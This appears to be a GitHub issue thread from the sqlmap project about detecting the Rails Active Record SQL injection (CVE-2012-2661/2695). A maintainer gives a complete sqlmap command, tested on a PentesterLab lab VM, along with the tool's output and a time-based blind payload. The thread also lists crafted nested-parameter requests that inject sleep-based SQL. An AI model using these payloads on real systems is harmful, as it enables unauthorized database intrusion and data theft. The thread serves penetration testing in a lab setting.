Closed Ogglas closed 9 years ago
Hi, Ogglas.
Are you have online test case/ writed case?
No I do not have that at the moment.
Similar environment (CVE-2012-2661) available here though:
Hmm, okey Ogglas. Thanks for help.
It goes like this. This would require rewriting of sqlmap's engine to support automatic injection into the parameter names (note: sqlmap can do this if user manually puts the injection marker *
there). This would introduce twice as many requests (1 set for parameter names and 1 set for parameter values). After the required update, this (automatic approach) would be feasible out of box.
Now, as this is currently old(-ish) vulnerability I am voting for leaving here details how to exploit it in sqlmap (if user knows that the vulnerability is there or suspects) rather than messing the code and introducing twice as many test requests
More info about the vulnerability and how to exploit it: https://pentesterlab.com/exercises/cve-2012-2661/course
Original URI (testing environment using ISO from https://pentesterlab.com/exercises/cve-2012-2661):
http://192.168.146.133/?id=1
sqlmap run:
python sqlmap.py -u "http://192.168.146.133/?id[information_schema%20WHERE%201%3D1*%20%3B%20--%20.user][1]=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1
...
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 129 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://192.168.146.133:80/?id[information_schema WHERE 1=1 AND SLEEP(1) ; -- .user][1]=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[11:19:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL 5.0.12
p.s. due to nature of this vulnerability, SLEEP
statement is being run multiple times (i.e. 1 delayed subquery per one table in information_schema
database because of affected SHOW TABLES
statement), so expect VERY SLOW data retrieval
Is there anyway to use sqlmap to find this vulnerability?
"The Active Record component in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage improper handling of nested hashes, a related issue to CVE-2012-2661."
Example CVE-2012-2661: Request:
controller?id=123
Query:SELECT
posts.* FROM
postsWHERE
posts.
id= '123'
Request:
controller?id[table.column]=123
Query:SELECT
posts.* FROM
postsWHERE
table.
column= '123'
Examples CVE-2012-2695: 1)
Request:
controller?id=123
Query:SELECT
posts.* FROM
postsWHERE
posts.
id= '123'
Request:
controller?id[table][column]=123
Query:SELECT
posts.* FROM
postsWHERE
table.
column= '123'
2)
Request:
controller?id=123
Query:SELECT
posts.* FROM
postsWHERE
posts.
id= '123
Request:
controller?id[mysql%20where%20(select%200)%20or%20sleep(1).xxx][yyy]=123
Queries:SHOW TABLES
SHOW TABLES IN mysql where (select 0) or sleep(1)
(...)SELECT
posts.* FROM
postsWHERE
mysql where (select 0) or sleep(1).
xxx.
yyy= '123'
http://www.cvedetails.com/cve/CVE-2012-2695/ http://blog.conviso.com.br/2012/06/ruby-on-rails-sql-injection-cve-2012_15.html http://seclists.org/oss-sec/2012/q2/504